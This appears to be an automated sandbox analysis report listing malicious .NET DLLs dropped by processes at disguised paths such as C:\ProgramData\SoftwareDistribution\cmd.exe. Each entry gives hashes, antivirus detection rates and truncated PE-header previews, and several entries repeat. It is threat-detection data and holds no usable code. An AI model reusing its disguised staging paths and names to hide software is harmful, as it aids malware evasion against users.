                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):126976
                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):89600
                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36352
                                                                                                                                  Entropy (8bit):5.668291349855899
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):38912
                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):69632
                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):126976
                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):69632
                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):294912
                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):32256
                                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):89600
                                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):50176
                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):41472
                                                                                                                                  Entropy (8bit):5.6808219961645605
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):342528
                                                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33280
                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64000
                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34304
                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
